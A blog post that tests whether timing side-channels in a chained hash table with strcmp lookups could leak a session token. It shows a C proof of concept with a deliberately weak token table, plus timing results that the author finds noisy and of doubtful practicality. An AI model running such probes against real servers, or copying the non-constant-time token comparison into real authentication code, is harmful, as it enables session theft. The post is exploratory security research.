First, start with there are no good constant-time data structures . After reading the HN thread , I wanted to see if the attack was truly viable. Can we recovery a JSESSIONID? My previous efforts attacking Lua took a slightly different tack.

To start, we need a vulnerable server. Worst case would be a simple hash table with chaining, such as one might build with the BSD queue macros. We’ll use a very simple hash function to make controlling the bucket simpler. And, of course, strcmp .

I’m exploiting some of my own knowledge attacking this server. For instance, I know there’s only four buckets, and I know the hash function, and I know the correct token values. The purpose wasn’t to build a fully weaponized attack, just to identify what timing irregularities may exist.

#include <sys/queue.h> #include <stdint.h> #include <stdlib.h> #include <stdio.h> #include <string.h> static inline uint64_t rdtsc ( void ) { uint32_t hi , lo; __asm volatile ( "rdtsc" : "=d" ( hi ), "=a" ( lo )) ; return ((( uint64_t ) hi << 32 ) | ( uint64_t ) lo ) ; } static inline uint32_t hashstr ( const char * s ) { const unsigned char * p = s; uint32_t hash = 5381 ; while (* p ) hash = ( hash << 5 ) + hash + * p ++ ; return hash; } struct token { TAILQ_ENTRY ( token ) next; char ident [ 16 ] ; int userid; } ; struct hashtable { TAILQ_HEAD (, token ) * buckets; int numbuckets; } ; void printhashtable ( struct hashtable * ht ) { struct token * tok; for ( int i = 0 ; i < ht -> numbuckets; i ++) TAILQ_FOREACH ( tok , &ht -> buckets [ i ], next ) printf ( "bucket %d ident %s userid %d

" , i , tok -> ident , tok -> userid ) ; } int finduser ( struct hashtable * ht , char * ident ) { uint32_t hash = hashstr ( ident ) ; struct token * tok; TAILQ_FOREACH ( tok , &ht -> buckets [ hash % ht -> numbuckets ], next ) if ( strcmp ( tok -> ident , ident ) == 0 ) return tok -> userid; return - 1 ; } void adduser ( struct hashtable * ht , char * ident , int userid ) { struct token * tok = malloc ( sizeof (* tok )) ; strlcpy ( tok -> ident , ident , sizeof ( tok -> ident )) ; tok -> userid = userid; uint32_t hash = hashstr ( tok -> ident ) ; TAILQ_INSERT_TAIL ( &ht -> buckets [ hash % ht -> numbuckets ], tok , next ) ; } void findduration ( struct hashtable * ht , char * ident ) { uint64_t duration = 0 ; finduser ( ht , ident ) ; finduser ( ht , ident ) ; for ( int i = 0 ; i < 500 ; i ++) { uint64_t before = rdtsc () ; finduser ( ht , ident ) ; uint64_t after = rdtsc () ; duration += after - before; } printf ( "duration for %s (bucket %d): %lld

" , ident , hashstr ( ident ) % ht -> numbuckets , duration ) ; } int main ( int argc , char ** argv ) { struct hashtable * ht = malloc ( sizeof (* ht )) ; ht -> numbuckets = 4 ; ht -> buckets = reallocarray ( NULL , ht -> numbuckets , sizeof (* ht -> buckets )) ; for ( int i = 0 ; i < ht -> numbuckets; i ++) TAILQ_INIT ( &ht -> buckets [ i ]) ; adduser ( ht , "Abcdef123456789" , 1 ) ; adduser ( ht , "Bbcdef123456789" , 2 ) ; adduser ( ht , "Cacdef123456789" , 3 ) ; adduser ( ht , "Dbcdef123456789" , 4 ) ; adduser ( ht , "Ebcdef123456789" , 5 ) ; adduser ( ht , "Fbcdef123456789" , 6 ) ; printhashtable ( ht ) ; /* find a single entry bucket */ printf ( "attacking the buckets!

" ) ; findduration ( ht , "Z00000000000002" ) ; /* bucket 1 pop 0 */ findduration ( ht , "Z00000000000003" ) ; /* bucket 2 pop 1 */ findduration ( ht , "Z00000000000000" ) ; /* bucket 3 pop 2 */ findduration ( ht , "Z00000000000001" ) ; /* bucket 0 pop 3 */ /* learn the string in bucket 2 */ printf ( "attacking the string!

" ) ; findduration ( ht , "000000000000001" ) ; /* match 0 */ findduration ( ht , "D00000000000001" ) ; /* match 1 */ findduration ( ht , "Db0000000000003" ) ; /* match 2 */ findduration ( ht , "Dbc000000000000" ) ; /* match 3 */ findduration ( ht , "Dbcdef120000002" ) ; /* match 8 */ findduration ( ht , "Dbcdef123000003" ) ; /* match 9 */ }

Compile and run.

gcc -std=c99 -O2 -o hashattack hashattack.c && ./hashattack bucket 0 ident Bbcdef123456789 userid 2 bucket 0 ident Cacdef123456789 userid 3 bucket 0 ident Fbcdef123456789 userid 6 bucket 2 ident Dbcdef123456789 userid 4 bucket 3 ident Abcdef123456789 userid 1 bucket 3 ident Ebcdef123456789 userid 5 attacking the buckets! duration for Z00000000000002 (bucket 1): 111388 duration for Z00000000000003 (bucket 2): 142084 duration for Z00000000000000 (bucket 3): 176934 duration for Z00000000000001 (bucket 0): 194512 attacking the string! duration for 000000000000001 (bucket 2): 143310 duration for D00000000000001 (bucket 2): 167790 duration for Db0000000000003 (bucket 2): 160232 duration for Dbc000000000000 (bucket 2): 168348 duration for Dbcdef120000002 (bucket 2): 194096 duration for Dbcdef123000003 (bucket 2): 216202

That’s only a single run, but it’s enough to get a picture. It’s about the same if hashattack is run again. The numbers show better (less) variability as the iteration count is increased from 500, but pounding a webserver with a half million requests to find what bucket a string hashes into is likely to be noticed. At least by anyone except Apple (ha!).

A few things are visible. Chasing down pointers as we traverse the list for a bucket takes time. I’ve skipped writing the code that determines how many buckets there are (exercise for the reader!) and jumped straight to the part where I probe each bucket in order. Each probe takes a little longer as the population increases. For reference, a difference of about 30000 represents a real time difference of about 12 microseconds. These numbers are also all the accumulated durations, not the average, fwiw.

Now that we’ve identified bucket 2 as containing a single token, let’s attack the string. Longer strings take longer to compare, but it’s harder to see any byte by byte differences. Once we’ve gotten the first letter correct, it’s hard to tell if the second or third letters are correct. If we’ve guessed eight letters, we can see a difference compared to none, but getting to that point may be difficult.

That’s with my laptop running at low speed. At turbo speed, the numbers look more like this.

attacking the buckets! duration for Z00000000000002 (bucket 1): 39993 duration for Z00000000000003 (bucket 2): 50488 duration for Z00000000000000 (bucket 3): 51985 duration for Z00000000000001 (bucket 0): 43142 attacking the string! duration for 000000000000001 (bucket 2): 28357 duration for D00000000000001 (bucket 2): 30691 duration for Db0000000000003 (bucket 2): 32046 duration for Dbc000000000000 (bucket 2): 32762 duration for Dbcdef120000002 (bucket 2): 70072 duration for Dbcdef123000003 (bucket 2): 70193

Now it seems we have a challenge on our hands. We’ve lost our bucket ordering! And the string timings are getting really close. Actually, that’s just one run. Here’s another.

attacking the buckets! duration for Z00000000000002 (bucket 1): 45178 duration for Z00000000000003 (bucket 2): 48686 duration for Z00000000000000 (bucket 3): 52857 duration for Z00000000000001 (bucket 0): 61896 attacking the string! duration for 000000000000001 (bucket 2): 46778 duration for D00000000000001 (bucket 2): 53483 duration for Db0000000000003 (bucket 2): 49679 duration for Dbc000000000000 (bucket 2): 63234 duration for Dbcdef120000002 (bucket 2): 63091 duration for Dbcdef123000003 (bucket 2): 64418

Hurray. The bucket ordering came back, though it’s still very close. The string timings are useless, now, though.

There’s something to be said about using real statistics instead of running a program twice, but even if we tune up the attack, it’s running against code written to be easy to exploit and under ideal conditions. Attacking over the internet will add more noise and require more probes to extract a signal from.

A real world attack, targeting a system using better hashing and chaining algorithms, may defeat us entirely. Maybe viable, maybe not, but not my first choice of attack against a web site.

Somebody beat me to it! Leaking information with timing attacks on hashtables describes another slightly different approach.